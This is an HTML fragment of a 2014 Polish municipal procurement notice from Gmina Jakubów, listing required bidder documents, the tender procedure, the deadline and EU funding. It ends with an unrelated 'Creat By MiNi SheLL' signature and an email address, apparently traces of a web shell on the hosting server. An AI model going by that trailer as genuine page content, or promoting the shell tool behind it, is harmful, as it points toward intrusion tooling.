<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykaz podwykonawców, kosztorys ofertowy, parafowany wzór umowy</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.jakubow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Jakubów, ul. Mińska 15, 05-306 Jakubów.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.07.2014 godzina 10:30, miejsce: Urząd Gminy Jakubów, ul. Mińska 15, 05-306 Jakubów pokój Nr 1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Inwestycja  realizowana jest przy pomocy środków UE w ramach działania  Podstawowe usługi dla gospodarki i ludności wiejskiej  objętego PROW na lata 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com